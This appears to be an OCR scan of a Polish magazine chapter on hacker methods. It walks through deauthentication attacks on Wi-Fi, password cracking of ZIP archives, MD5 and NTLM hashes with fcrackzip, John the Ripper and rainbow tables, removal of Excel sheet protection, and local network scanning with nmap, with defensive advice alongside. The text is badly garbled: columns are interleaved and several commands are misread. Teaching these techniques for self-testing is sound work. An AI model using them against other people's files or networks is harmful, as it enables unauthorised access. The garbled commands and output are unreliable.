my ustawić ochronę przed każdym z tych 
ataków. 


Po ustawieniu każdego typu na Mocne 

w przypadku próby ataku na nasz router 
atakujący automatycznie zostanie dodany do 
naszej listy zablokowanych urządzeń i router 
nie będzie przyjmował więcej pakietów od 
tego konkretnego urządzenia. 
Warto aktywować te ustawienia, jeśli nasz rou- 
ter na to pozwala, by nie martwić się, że ktoś 
choćby dla żartów go zablokuje. 


O kasuj 


adres IP Adres MAC 


23-34-44-56 
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Trzy tryby mocy transmisji sygnału 


Ogólne 


z s s. 
Wi-Fi Jamming % * Wireless - Ogólne 


T o blokowanie dostępu do sieci bezprze- 
wodowej. W większości ataki takie nie 
są przeprowadzane za pomocą urządzeń 
typu jammer, ale raczej deauther. Atak 
polega na zastosowaniu znanego nam już 
polecenia pakietu aireplay-ng --deauth, 
który poznaliśmy, testując sieci z zabezpie- 
czeniem WPA2. Wystarczy, że ktoś podrzu- 
ci urządzenie skonfigurowane do deauten- 
tykacji klientów danej sieci, a żaden z nich 
nie będzie mógł skorzystać z Wi-Fi, bo co 
sekundę będzie rozłączany. Jest to prze- 
stępstwo niezwykle uciążliwe, ponieważ 
trudno znaleźć urządzenie, które blokuje 
sieć. Jedyną ochroną przed takim atakiem 
jest aktywowanie w routerze specjalnych 
ramek zarządzania Protected Manage- 
ment Frames (PMF) ©, które pozwalają 
na ochronę połączonych z siecią klientów 
przed pakietami typu deauth. Taką funkcję 
w routerach Asus znajdziemy w zakładce 
Wireless w ustawieniach sieci. Mogą z niej 
skorzystać tylko użytkownicy, których rou- 


4 Stan 
Ustawienia sieci bezprzewodowej | SGHZ 
8% Sieć 
Test_KS Jkryj nazwę siex 
Sieć bezprzewodowa ZE : 
t WPA-PSK 
n anie KiP (E: 
Ha 54546615 
Tryb Mieszany 802.11b/q/n 
. Sze! ” Auto 
śą £ Kosz j zet anału 
+2 _ Sieć dla gości J 
anał Auto 
«Przekierowanie 
© portów Moe transmisj 
Ustawienia USB 


WPS WDS 


Pasmo 


Nazwa sieci (SSID) 


Ukyj SSID 


Tryb bezprzewodowy 


Pasmo kanału 


Kanał 


Kanał rozszerzony 


Tryb autentykacji połączenia 
bezprzewodowego 


Szyfrowanie WPA 


WPA Pre-shared Key 


Protected Management Frames 


Czas wymiany klucza 


Filtr MAC karty sieci bezprzewodowej 


w ustawieniach routera Tp-Link Archer C9 V4 


Ustaj 


Poniżej opisane są ustawienia informacji dla sieci bezprzewodowej. 


2.4GHZ Y 

© Tak O Nie 

automat v M Zoptymalizoy 
40 MHz ” 

6 

Above v 

wPA2-Personal 


AE> V 


Test1Test2 


wyłącz v 
wyłącz 
Capable 
Requirech 


ter ją udostępnia, a urządzenie do łączenia się 
z siecią, wspiera tę technologię (802.11w). 

Alternatywną metodą ochrony jest zmniejsze- 
nie mocy nadawanego sygnału - jeśli osoba, 


która będzie chciała zakłócić pracę naszej sieci, 
nie będzie w jej zasięgu, atak nie będzie możli- 
wy. Odpowiednie opcje znajdują się w zaawan- 
sowanych ustawieniach sieciowych routera. 
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Jak hakerzy 
odszyfrowują hasła 


Każdy z nas ma przynajmniej kilka albo i kilkanaście czy 
więcej różnego rodzaju kont, każde z nich jest zabezpieczone 
hasłem. Warto wiedzieć, jakiego typu hasła są niebezpieczne 
i w jaki sposób zapobiegać łamaniu naszych haseł 


poprzednim rozdziale analizowaliśmy 

ataki na sieci Wi-Fi, które również za- 
bezpieczone są hasłem, zaszyfrowanym na 
przykład przez WPA2. Hasła i klucze zabez- 
pieczane są różnego rodzaju algorytmami 
kryptograficznymi. Na przykład bardzo 
dużo haseł w bazach online jest szyfrowa- 
nych przez algorytm MD5, hasła do systemu 
Windows są zakodowane przez NTLM, a co- 
raz częściej są wykorzystywane algorytmy 
AES-128 lub AES-256. Właściwie każdy z tych 
algorytmów jest na swój sposób bezpieczny, 


jeśli hasło jest odpowiednio długie. Różnią 
się one czasem potrzebnym na zdekodowa- 
nie hasła - im bardziej złożony algorytm, 
tym więcej czasu zajmuje sprawdzenie jed- 
nej możliwości - hashu. 

Nie ma jednak algorytmu, który gwaranto- 
wałby w 100 procentach bezpieczeństwo 
naszych kont i plików - decydujące znacze- 
nia dla ich ochrony ma tworzenie długich 
i skomplikowanych haseł, tak złożonych, by 
atakujący nie był w stanie ich złamać w re- 
alnym czasie. 


Odczytywanie haseł do archiwów 


użo osób tworzy archiwa zabezpieczone 

hasłem, w których przechowuje poufne 
informacje. Możemy bardzo szybko przepro- 
wadzić różnego rodzaju testy penetracyjne, 
które pozwolą ocenić, jak silne w rzeczywi- 
stości jest nasze zabezpieczenie. 


W zależności od użytego typu archiwum, na 
przykład RAR, ZIP, 7Z czy inne, czas deszy- 
frowania zabezpieczeń może się różnić. 


Archiwa z rozszerzeniem ZIP 
Jest to jedno z najbardziej podstawowych archi- 
wów. Jest to domyślny format do 


krzysiekekali:-/Pobrane$ sudo apt install fcrackzip 
Czytanie list pakietów... Gotowe 

Budowanie drzewa zależności 
Odczyt informacji o stanie... 


pakowania plików w Windows. 
W systemie Kali Linux do jego 
odszyfrowania można użyć wielu 


Gotowe narzędzi, między innymi ferack- 
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zip. Przed użyciem musimy je zain- 
stalować, korzystając z komendy: 
sudo apt install ferackzip []. 
Instrukcję obsługi E] pozna- 
my, wpisując polecenie man 
ferackzip 

Archiwa ZIP zabezpieczone 
hasłem tworzymy, wpisując 
polecenie: 

zip -re [nazwa archiwum].zip 
[katalog lub plik do spakowa- 
nia] H. 

Następnie dwukrotnie podajemy 
hasło do archiwum. 


Korzystamy z fcrackzip 
W Terminalu przechodzimy 
do lokalizacji z zabezpieczo- 

nym archiwum w formacie ZIP 

i wykonujemy polecenie: 

ferackzip -vv -u -b -I 5 [nazwa 

archiwum.zip] []. 


krzysiekGkali:-/Pobrane$ fcrackzip -vv -u -b -Ll 5 test1.zip 
'Test KS/' is not encrypted, skipping 

'Test KS/Pinta.Tools/' is not encrypted, skipping 

found file 'Test KS/Pinta.Tools/CoreToolsExtension.cs', (size 
„ chk bafd) 

'Test KS/Pinta.Tools/Tools/' is not encrypted, skipping 

found file 'Test KS/Pinta.Tools/Tools/BaseTransformTool.Ccs', 
ags 9, chk bafd) 

found file 'Test KS/Pinta.Tools/Tools/FreeformshapeTool.cs', 
ags 9, chk bafd) 

found file 'Test KS/Pinta.Tools/Tools/TextTool.cs', (size cp/ 
k bafd) 

found file 'Test KS/Pinta.Tools/Tools/GradientTool.cs', (size 
„ chk b8fd) 

found file 'Test KS/Pinta.Tools/Tools/PanTool.cs', (size cp/u 
bafd) 

found file 'Test KS/Pinta.Tools/Tools/ColorPickerTool.cs', (s 
s 9, chk bafd) 

found file 'Test KS/Pinta.Tools/Tools/MoveSelectionTool.cs', 
ags 9, chk bafd) 

8 file maximum reached, skipping further files 

checking pw tdl— 


krzysiekGkali: -/Pobrane$ |] 


wyżej 10 znaków metoda łamania siłowego 


Parametr -vv umożliwia wyświetlanie postę- 
pu deszyfrowania, -b określa atak siłowy, -I 
długość hasła, -u przyspiesza deszyfrowanie 
przez wychwytywanie błędnych haseł. 


W przypadku hasła o długości pięciu 
znaków czas dekodowania to zaledwie 
kilkadziesiąt sekund. Dla haseł o długości po- 


nie ma żadnego sensu. Możemy wtedy jedy- 
nie starać się przetestować metodę łamania 
z wykorzystaniem słowników. 


3. celu przeprowadzenia testowego 
ataku słownikowego należy skorzystać 
z polecenia: ferackzip -u -D -p /usr/share/ 
wordlists/rockyou.txt [nazwa archiwum. 


krzysiekGkali:-/Pobrane$ zip -re testl.zip Test KS 


Enter password: 
Verify password: 
adding: Test KS/ (stored 0%) 


zip] 

Możemy użyć dowolnego 
słownika - nawet takiego, któ- 
ry sami wygenerujemy. 


krzysiekQkali: -/Pobrane 


DESCRIPTION 


[--method name] [--modulo r/m] file... 


D rzysiek(dkali: -/Pobrane 80x24 
FCRACKZIP(1) General Commands Manual FCRACKZIP(1) 
NAME 
fcrackzip - a Free/Fast Zip Password Cracker 
syNorsis [|] 
fcrackzip |-bDBchVvplum2| |--brute-torcej |--dictionary| |--benchmark| 
[--charset characterset] [--help] [--validate] [--verbose] 
[--init-password string/path] [--length  min-max] [--use-unzip] 


fcrackzip searches each zipfile given for encrypted files and tries to 
guess the password. ALL files must be encrypted with the same password, 
the more files you provide, the better. 
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jak hakerzy łamią hasła 


Uniwersalne narzędzie do haseł 


krzysiekGkali:-$ sudo john --list=formats 

[sudo] hasło użytkownika krzysiek: 

descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS, 
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-sshal, aix-ssha256, 
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-sshal, asa-md5, 
AxCrypt, AzureAD, BestCrypt, bfegg, Bitcoin, BitLocker, bitshares, Bitwarden, 
BKS, Blackberry-ES16, WoWSRP, Blockchain, chap, Clipperz, cloudkeychain, 
dynamic _n, cq, CRC32, shalcrypt, sha256crypt, sha5l2crypt, Citrix NS10, 
dahua, dashlane, diskcryptor, Django, django-scrypt, dmd5, dmg, dominosec, 
dominosec8, DPAPImk, dragonfly3-32, dragonfly3-64, dragonfly4-32, 
dragonfly4-64, Drupal7, eCryptfs, eigrp, electrum, EncFS, enpass, EPI, 
EPiServer, ethereum, fde, Fortigate256, Fortigate, FormSpring, FVDE, geli, 


Wpisujemy komendę sudo zip2john 


J ednym z najbardziej popularnych i istnie- 
test3.zip > plik_hash.hash 


jących od dawna crackerów jest program 
John the Ripper ©- 
Obsługuje ponad 100 różnego rodzaju for- 
matów plików, archiwów, szyfrowań. Wła- 


Dzięki temu w pliku z rozszerzeniem 
hash zostanie umieszczony hash, który 


ściwie każdy rodzaj szyfrowania można 
spróbować dekodować, korzystając z tego 
crackera. Możemy zdecydować się na me- 


będzie deszyfrowany. Następnie rozpoczy- 
namy wydobywanie hasła, wykonując ko- 
mendę sudo john plik_hash.hash Z]. Jak 


todę siłową lub 
słownikową. 

W celu urucho- 
mienia progra- 
mu wystarczy 
wpisać polece- 
nie sudo john ©. Potem podajemy odpowied- 
nie opcje i pliki z hasłami do odszyfrowania. 


rzysiekekali:-$ sudo john 

John the Ripper 1.9.0-jumbo-1 OMP [linux-gnu 64-bit x86 64 AVX2 AC] 
Copyright (c) 1996-2019 by Solar Designer and others 

Homepage: http: //www.openwalLl.com/john/ 


Usage: john [OPTIONS] [PASSWORD-FILES] 


widać, hasło zostało wykryte w sekundę. 
To ogromny wzrost wydajności w stosunku 
do narzędzia fcrackzip, które nie korzysta 
ZIP z hashowania. 
W poprzednim przykładzie deszyfrowanie ha- 
sła do archiwum ZIP zajęło około 55 sekund. 
Teraz spróbujmy odczytać to samo hasło za- 
bezpieczające archiwum o nazwie test3.zip 


za pomocą John the Ripper. 


Bardziej standardowe wykorzystanie tego 
programu to: podanie w pliku TXT hashu 
odpowiedniego formatu, który chcemy odszy- 
frować, słownika z hasłami do sprawdzenia 


krzysiekgkali:-$ sudo zipzjohn test3.zip > plik hash.hash 
ver 2.0 efh 5455 efh 7875 test3.zip/test3.txt PKZIP Encr: 2b chk, TS chk, cmplen=26, decmplen=18, crc=AD3E015C 


krzysiekckali:-$ sudo john plik hash.hash [JJ 

Using default input encoding: UTF-8 

Loaded 1 password hash (PKZIP [32/64] ) 

WitL run 8 OpenMP threads 

Proceeding with single, rules:Single 

Press 'q' or Ctrl-C to abort, almost any other key for status 

testl (test3.zip/test3.txt) 

1g 0:00:00:01 DONE 1/3 (2020-01-07 14:23) 0.9090g/s 138.1p/s 138.1c/s 138.1C/s 
t.txtl 

Use the "--show" option to display all of the cracked passwords reliably 
Session completed 
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krzysiekGkali:-$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 md5.txt 


Using default input encoding: UTF-8 


Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) 
Warning: no OpenMP support for this hash type, consider --fork=8 
Press 'q' or Ctrl-C to abort, almost any other key for status 


12345678 (2) 


i uruchomienie testowego ataku. Wystarczy 
podać ścieżkę do słownika, format hashu 
oraz plik tekstowy zawierający hash. Wpi- 


Tablice tęczowe 


ablice tęczowe, czyli inaczej Rainbow 

Tables, były bardzo popularne jeszcze 
całkiem niedawno. Oczywiście nadal są wy- 
korzystywane przy odszyfrowywaniu haseł, 
zwłaszcza przez osoby, które nie mogą sko- 
rzystać z mocy GPU w celu przyspieszenia 
dekodowania szyfrowania. W wielu przypad- 
kach przy sprawdzaniu całych baz danych 
stosuje się jednocześnie tablice tęczowe 
i wiele jednostek GPU. 
Tablice tęczowe mogą mieć ogromne roz- 
miary, nawet ponad 1000 GB. Użycie tablicy 
tęczowej bardzo przyspiesza dekodowanie, ale 
jej wygenerowanie wymaga ogromnej ilości 
zasobów (głównie mocy obliczeniowej proce- 
sora i czasu) w celu wytworzenia zbioru hashy 
odpowiadających czystemu tekstowi. 
Jest to istotne, ponieważ użytkownik, wpro- 
wadzając hasło, zawsze podaje je w formie 
zwykłego tekstu, przy jego zapamiętywaniu 
komputer wykonuje operacje one-way hash 
i szyfruje hasło. Nie da się odwrócić tego proce- 
su algorytmicznie - by odszyfrować hasło, trze- 
ba wygenerować słowo, zamieniając na hash 
i porównując z tym, który chcemy odczytać. 
Jeśli wystąpi zgodność, hasło zostało odkryte, 
jeżeli nie - generowane jest kolejne słowo do 
porównania. 
Ten proces jest dość wolny, dlatego właśnie 
wymyślono tablice tęczowe - taka tablica za- 


sujemy: sudo john --wordlist=/usr/share/ 
wordlists/rockyou.txt --format=raw-md5 
md$5.txt 


CZAS ŁAMANIA STU OSMIOZNAKO- 
WYCH HASEŁ NTML (WINDOWS) 


40 


30 


|=] 
Tablice tęczowe 


Hasła NTLM są wykorzystywane między 
innymi do autoryzacji w systemie Windows 
i mogą być złamane bardzo szybko 
zwykorzystaniem tablic tęczowych 


Metoda siłowa 


cy, a w przypadku znalezienia pary od razu 
wskazywane jest odpowiednie hasło zapisane 
w formie zwykłego tekstu. 

Potrzebny jest więc jedynie czas na przeszuki- 
wanie tablicy, nie są już wykonywane żadne 
obliczenia. 


Generujemy tablice tęczowe 

i odczytujemy hasło NTLM 
Zaczynamy od zainstalowania pakietu 
Rainbow Crack: 

sudo apt install rainbowcrack ©. 


wiera już wszystkie możliwe słowa ze 
swojego słownika wraz z odpowiednim 


krzysiekGkali:-$ sudo apt install rainbowcrack 
Czytanie list pakietów... Gotowe 


wcześniej wygenerowanym hashem, więc 
przy ataku proces wygląda nieco inaczej. Hash 
z hasłem porównywany jest z hashem w tabli- 


Następnie generujemy tablice tęczowe, 
z których będziemy korzystać: 


POZNAJ METODY HAKERÓW 55 


adam1l3zajacigmail.com 


jak hakerzy łamią hasła 


sudo rtgen ntlm loweralpha 
7 70 1000 1000 0 6, gdzie: 

z sudo rtgen - uruchamiamy ge- 
nerator tablic tęczowych wcho- 
dzący w skład pakietu Rainbow 
Crack, 

z ntlm - wykorzystany algorytm 
hashowania; 

m loweralpha - zdefiniowany 
zakres znaków, z których gene- 
rowane będą hasła; wpis lowe- 
raplha oznacza małe litery, 

m 7 7 - długość generowanych haseł, pierw- 
sza liczba to minimalna długość hasła, druga 
- maksymalna, 

m 0 - określenie wykorzystania funkcji re- 
dukcji poprzez indeksowanie tablicy, 

z 1000 1000 - długość łańcucha tablicy oraz 
liczba łańcuchów do wygenerowania, 


rzysiekGkali:-$ sudo rtgen ntlm loweralpha 7 7 6 1606 1806 © 
rainbow table ntlm loweralphaż7-7 6 1000x1086_O.rt parameters 
hash algorithm: 
hash length: 16 
charsct namc: 
charset data: 
charsel dala in hex: 
charset length: 26 
plaintext length range: 
reduce offset: 
plaintext total: 


ntlm 


Lloweralpha 
abcdefghijklmnopqrstuvwxyz 


KASZ 
0x00000008 
8831810176 


sequential starting point begin from 6 (0x0000000000000006) 

jgenerating. 

1060 of 1000 rainbow chains generated (0 m 86.8 s) 
F AAC | 


61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 


Możemy modyfikować parametry zgodnie z in- 
formacją zawartą w instrukcji do programu, 
dostępnej po wpisaniu komendy sudo rtgen 


Sortujemy wygenerowaną tablicę: 
sudo rtsort. 


Następnie uruchamiamy odszyfrowywa- 


m 0 - numer indeksowy części, pozwala na 
łączenie kilku tablic w jedną - są do siebie 
dodawane tablice o takim samym indeksie. 


krzysiekekali:-$ sudo rtsort . 

./ntlm loweralphaś7-7 0 1000x1000 0.rt: 
22337409024 bytes memory available 
loading data... 

sorting data... 

writing sorted data... 


nie, wpisując komendę: 
sudo rcrack . -h 13FCSCBOGAB589A- 
E3176E20D03C341D1 


Podany ciąg znaków to wyciągnięty z Win- 
dows hash formatu NTLM zawierający ha- 

sło do systemu, które można prosto zdekodo- 

wać przy wykorzystaniu tablic tęczowych 


krzysiekekali:-$ sudo rcrack . -h 13FC8CB06AB589AE3176E20D03C341D1 

2 rainbow tables found 

memory available: 17655788339 bytes 

memory for rainbow chain traverse: 16000 bytes per hash, 16000 bytes for 1 hashes 
memory for rainbow table buffer: 2 x 1600016 bytes 

disk: ./ntlm loweralphaś7-7 0 1000x100000 0.rt: 1600000 bytes read 

disk: ./ntlm loweralphaś7-7 6 1000x1000 ©.rt: 16000 bytes read 

disk: finished reading all files 

plaintext of 13fc8cb06ab589ae3176e20d03c341dl is aaaaaat 


statistics 

plaintext found: Toli 
total time: 8.02 s 
|time of chain traverse: 8.02 s 
time of alarm check: 0.00 s 
time of disk read: 0.00 s 
hash 6 reduce calculation of chain traverse: 499000 
hash 6 reduce calculation of alarm check: 2027 


number of alarm: 6 
performance of chain traverse: 26.26 million/s 
performance of alarm check: 2.03 million/s 


result 


13fc8cb06ab589ae3176e20d03c34ldl aaaaaat hex:61616161616174 
krzysiekGkali:-$ |] 
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Jak się zabezpieczyć przed atakami 
na zaszyfrowane archiwa i hasła 


J edyną skuteczną ochroną jest korzystanie 
z odpowiednio długich i mocnych haseł, 
które nie znajdują się w popularnych słow- 
nikach. W przypadku haseł do systemu Win- 
dows należy utworzyć skomplikowane hasło 
o długości przynajmniej 13 znaków, w przy- 
padku archiwów może wystarczyć hasło 
o długości 11 znaków. Najlepiej jest jednak 
korzystać z haseł o długości przynajmniej 16 
znaków. Dzięki temu nawet jeśli moc oblicze- 
niowa urządzeń do łamania haseł wzrośnie, 
nadal będziemy bezpieczni. 


Złudne zabezpieczenia 
dokumentów pakietu Office 

Jeśli korzystamy z arkuszy kalkulacyjnych lub 
tworzymy dokumenty, korzystając z pakietu 
Microsoft Office, nieraz pewnie zdarzyło 
nam się zabezpieczyć arkusz przed edycją 
specjalnym hasłem, aby nikt nie mógł edy- 
tować naszego pliku 
bez podania hasła. Jeśli 
korzystamy z nowszego 
formatu i zapisujemy ar- 
kusze lub dokumenty 
z rozszerzeniem XLSX 


r="Hl4"><v>13</v></c></row></sheetData>FHESTUN UTA ST) 
algorithmNamc="SHA 512" hashValuc="+>ElsvLNmoluorlg IB9m 
+Ty7VJty7grNezRpMoszeU52cYi1NGPU1nOZII7wiihqM5sCYB6ldizriTu/lIwTpoliw==" 
saltValue="wPNCANvr6FioIEwCnkUttA==" 
UUDSCOAWECTEOACZAEWEx pageMarg ins left="0.7" right="0.7" top="0.75" 
bottom="0.75" header="Q.3" footer="0.3"/></worksheet> 


Teraz przechodzimy do 
folderu xl, a następnie 
worksheets ©- PORE 
Klikamy na plik typu | * Les 
sheet1.xml prawym |5/s%vesxm 
u workbook.xmi 


przyciskiem myszy i wy- 
bieramy opcję Edytuj ©. 


Otwórz 
Otwórz wewnątrz 
Otwórz wewnątrz * 
Otwórz wewnątrz £ 
Otwórz na zewnątrz 
Podgląd 


Edytuj 


Zmień nazwe 


Enter 
Ctri+PgDn 


Shift+Enter 
F3 


12 


Klikamy na For- | Format Widok Pomoc 


wierszy - ba Czcionka... 


=UV.3 FC 


spinCount="100000" sheet="1" 


/ DOCX, można bardzo 
łatwo usunąć taką ochronę. 


Instalujemy program do wykonywania 
operacji na archiwach, na przykład 7-Zip. 


Przechodzimy do folderu z zapisanym 

arkuszem programu Excel, klikamy na 
niego prawym przyciskiem myszy i wybie- 
ramy opcję Otwórz archiwum 


Nowy 

SIT 
"SF Drukuj 

EJ 

a mą Zniszcz 
Jem em 
+ 7-Zip > Otwórz archiwumi 
RC SHA i 
Test2xii _ CRC SI > Otwórz archiwum 
[Edit with Notepad++ wypakuj pliki... 


Teraz przeszukujemy plik, aż znajdziemy 

wpis, który rozpoczyna się od znaków 
<sheetProtection ©, zaznaczamy cały na- 
wias - kończy się on mniej więcej w ten spo- 
sób: scenarios="1"/> - i kasujemy. 


Następnie zapisujemy zmiany, klikamy 

na OK i zamykamy program 7-Zip. Gdy 
teraz otworzymy arkusz, nie będzie on już 
chroniony hasłem. 


Jeśli zależy nam na ochronie naszego arkusza 
lub dokumentu, lepiej przekonwertować go 
do formatu, który nie pozwala na edycję, na 
przykład PDF, lub dodać do archiwum i za- 
bezpieczyć je hasłem. 
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Jak chronić się 
przed podsłuchem 
w sieci lokalnej 


Jeśli atakujący znajdzie się już w naszej sieci lokalnej albo to 
my znajdziemy się w tej samej sieci co atakujący, na przykład 
korzystając z darmowego punktu dostępowego w restauracji 
lub na lotnisku, jesteśmy narażeni na podsłuchiwanie naszej 
komunikacji i przechwycenie danych 


amo podsłuchiwanie to tak zwany Snif- 

fing, który polega na wyłuskiwaniu 
z szumu sieciowego naszych pakietów ko- 
munikacyjnych, przechwytywaniu ich i od- 
czytywaniu. W ten sposób atakujący może 
poznać nasze hasła, wiadomości, e-maile, 
przechwycić przesyłane zdjęcia i inne dane. 
Zanim jednak tego dokona, musi przeskano- 
wać naszą sieć, sprawdzić, jakie porty nasz 
komputer ma aktywne, sprawdzić dane na- 
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szego urządzenia i na podstawie tych danych 
ukierunkować na nas odpowiedni atak. Jeśli 
korzystamy z Windows 10 i sami nie urucho- 
miliśmy niebezpiecznych usług, które mają 
luki bezpieczeństwa, powinniśmy czuć się 
relatywnie bezpiecznie, jeżeli chodzi o sam 
system i pliki na naszym dysku. Jednak już 
komunikacja, zwłaszcza drogą bezprzewodo- 
wą, może być zagrożona, ponieważ nie jest 
zależna od systemu, z jakiego korzystamy. 
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W tym rozdziale zobaczymy, jak krok po 
kroku wygląda atak od strony atakującego, 
abyśmy znając jego techniki, byli w stanie 
przygotować odpowiednią linię obrony, 
a w efekcie - nie dali się podsłuchać. 


Skanujemy sieć 


kanowanie sieci może dostarczyć bar- 
dzo wielu ciekawych informacji. Warto 
sprawdzić, jakie dane można odczytać po 
podpięciu się do naszej sieci. W tym celu 
można skorzystać z wielu różnego rodzaju 


Działanie programów Armitage oraz Meta- 
sploit poznamy w kolejnym rozdziale doty- 
czącym przejmowania kontroli nad kompute- 
rami. W tym skupimy się na skanerach sieci 
oraz snifferach („programach węszących”). 


Korzystamy z programu Zenmap 
Musimy najpierw zainstalować aplika- 
cję Zenmap. Trzeba pobrać jej paczkę 

ze strony: https://nmap.org/dist/zen- 

map-7.80-1.noarch.rpm 


narzędzi. Jednym 
z niezastąpionych 
jest w tym wypad- 
ku program Nmap, 
który jest wyko- 
rzystywany rów- 


Latest stable release: 


x86-64 (64-bit Linux) Nmap RPM: nmap-7.80-1.x86_64.rpm 

x86-64 (64-bit Linux) Ncat RPM: ncat-7.80-1.x86_64.rpm 

x86-64 (64-bit Linux) Nping RPM: nping-0.7.80-1.x86_64.rpm 

Optional Zenmap GUI (all platforms): zenmap-7.80-1.noarch.rpm 

Source RPM (includes Nmap, Zenmap, Ncat, and Nping): nmap-7.80-1.src.rpm 


nież jako moduł 
w znacznie bardziej rozbudowanych narzę- 
dziach testowych. W podstawowej formie 
możemy z niego korzystać w Terminalu. 
W naszym przykładzie skorzystamy jednak 
z jego wygodniejszej formy - Zenmap z na- 
kładką graficzną, która ułatwia wykonywa- 


Następnie uruchamiamy Terminal i prze- 
chodzimy do lokalizacji, w której zapisali- 
śmy pobrany plik, oraz wykonujemy komendy: 
sudo apt-get install alien [£] 
sudo alien zenmap-7.80-1.noarch.rpm E£] 


nie skanów sieci i inter- 
pretację wyników. 


krzysiekGćkali:-/Pobrane$ sudo alien zenmap-7.80-1.noarch. rpm 
zenmap_7.80-2 all.deh generated 
krzvsiekGkali:-/Pobraneś N 


sudo dpkg -i zenmap_7.80-2_all.deb [4 


Czytanie list pakietów... Gotowe 
Budowanie drzewa zależności 


Odczyt intormacji o stanie... Gotowe 


opencl-orca-amdgpu-pro-icd 
Aby go usunąć należy użyć "sudo apt autoremove". 


|sugecrowanc pakiety: 


elfutils rpmlint rpm2html 
Zostaną zainstalowane następujące NOWE pakiety: 


Konieczne pobranie 14,6 MB archiwów. 


Kontynuować? [T/n] 


krzysiekgkali:-/Pobrane$ sudo apt-get install alien LI 


INastępujący pakiet został zainstalowany automatycznie i nie jest już więcej wymagany: 


The following additional packages will be installed: 
autopoint debhelper debugedit dh-autoreconf dh-strip-nondeterminism dwz intltool debian 
libarchive-cpio-perl libarchive-zip-perl libdebhelper-perl libfile-stripnondeterminism-pert 
libltdl-dev libmail-sendmail-perl librpm8 librpmbuilds librpmio8 librpmsign8 libsub-override-perl 
libsys-hostname-long-perl libtool po-debcont rpm rpm-common rpm2cpia 


lintian dh-make rpm-il8n libtool-doc gfortran | fortran95-compiler gcj-jdk libmail-box-pertl 


alien autopoint debhelper debugedit dh-autoreconf dh-strip-nondcterminism dwz intltool debian 
libarchive-cpio-perl libarchive-zip-perl libdebhelper-perl Libfile-stripnondeterminism-perl 
libltdl-dev libmail-sendmail-perl librpm8 librpmbuild8 Librpmio8 librpmsign8 libsub-override-perl 
libsys-hostname-long-perl libtool po-debcont rpm rpm-common rpm2cpio 

je aktualizowanych, 25 nowo instalowanych, 6 usuwanych i 46 nieaktualizowanych. 


Po tej operacji zostanie dodatkowo użyte 18,9 MB miejsca na dysku. 
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krzysiekćkali:-/Pobrane$ sudo dpkg -i zenmap_7.80-2 alt.deb[Ą 
Wybieranie wcześniej niewybranego pakietu zenmap. 

(Odczytywanie bazy danych ... 
Przygotowywanie do rozpakowania pakietu zenmap_7.80-2 all.deb ... 


300317 plików i katalogów obecnie zainstalowanych. ) 


Rozpakowywanie pakietu zenmap (7. 
Konfigurowanie pakietu zenmap (7 
Przetwarzanie wyzwalaczy pakietu 
Przetwarzanie wyzwalaczy pakietu 
Przetwarzanie wyzwalaczy pakietu 
Przetwarzanie wyzwalaczy pakietu 
krzysiekekali:-/Pobrane$ |] 


8852) 22. 

«80-2) --- 

kali-menu (2020.1.4)... 
desktop-file-utils (0.24-1)... 
mime-support (3.64)... 

man-db (2.9.0-2)... 


Od tej pory będziemy mogli uruchomić 
program Zenmap, wpisując w Terminalu 
polecenie sudo zenmap 


Po uruchomieniu programu Zenmap może- 

my przystąpić do skanowania sieci. W celu 
wykonania skanu musimy zapoznać się z pod- 
stawową obsługą programu Zenmap. W lewym 
górnym rogu znajduje się pole Cel ©, w które 
musimy wpisać adres bądź też zakres adresów 
do przeskanowania. Musimy więc wiedzieć 


Skan Narzędzia 


Profil Pomoc 


Cel: _ 192.168.43.184/24 - 


Komenda: nmap -sn192.168.43.184/24 


W naszym przykładzie lokalnie przydzielo- 
ny adres IP to 192.168.43.184. Router może 
przydzielać adresy w ostatnim segmencie 
od 0 do 255. Jeśli więc chcemy przeskano- 
wać całą sieć, wystarczy w pole Cel wpisać 
192.168.43.184/24 © (maska /24 bit ozna- 
cza 256 adresów czyli od O do 255). 
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jaki jest nasz adres IP, aby wykluczyć go z póź- 
niejszej analizy, oraz jaki jest adres samej sieci 
w celu jej skutecznego przeskanowania. 


Następnie wybieramy profil skanowania 
- z pola Profil. Do wyboru mamy aż 10 


krzysiekćkali:-/Pobrane$ sudo zenmap 


Skan Narzędzia Profil Pomoc 


Skan 


Anulu 


Komenda: | nmap -sn 
Hosty , Usługi Wynik działania Nmapa / Porty / Hosty Topologia Szczegóły hosta Skany 
C.zża ep E w >zczegót 


SPRAWDZAMY NASZ ADRES W SIECI WEWNĘTRZNEJ 
I POZNAJEMY SAM ADRES SIECI 


W systemie Kali Linux jest to bardzo proste, wystarczy wpisać w Terminalu polecenie 
ip a | grep -w inet, a przy adresie IP będzie podany również interfejs sieciowy. 


krzysiekGkali:-$ ip a | grep -w inet 

inet 127.0.0.1/8 scope host lo 

inet 192.168.43.184/24 brd 192.168.43.255 scope global dynamic 
noprefixroute wlane 
krzysiekGkali:-$ I 
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Skan Narzędzia Profil Pomoc 


Cel:  192.168.43.184/24 +  Profll:  Pingscan + Skan 
Komenda: | nmap -sn192.168.43.184/24 Intense scan 
Intense scan plus UDP 
i Wynik działania Nmapi 
Sizzi sa |ilostaya . P Intense scan, all TCP ports Y 
t = nmap -sn 192.168.43. Intense scan, no ping Szczegóły 
192.168.43.1 Starting Nmap 7. 3:45 CET 
STATEK Nmap scan report 
SKTOP-6BS7( 
DORIETROSZJA Host is up (0.61! Qujckscan 
kali (192.168.43.184) MAC Address: 28:1 chnology 
(Beijing)) Quick scan plus 


Nmap scan report 
Host is up (0.00( QUicktraceroute 


gotowych profili, najszybszą metodą skano- | wybrać inny profil skanowania. Na przykład 
wania, która pozwoli na sprawdzenie aktyw- | wybierając Quick Scan i ponownie urucha- 
nych w sieci urządzeń, jest Ping Scan ©. Taki  miając skan, dowiemy się, jakie porty są 
skan polega na wykorzystaniu pakietu PING otwarte na innych maszynach 

w celu sprawdzenia, czy 
jakikolwiek z adresów Sie- | ce:  192.168.43.184p24 + Profil: | Quickscan 
ciowych odpowie na nasze 
„zapytanie”. Po podaniu 
celu oraz wybraniu pro- Hosty | Usługi Wynik działania Nmapa Porty/Hosty Topologia Szczegóły hosta Skany 
filu wystarczy kliknąć na | - = nmap -T4 -F 192.168.43.184/24 


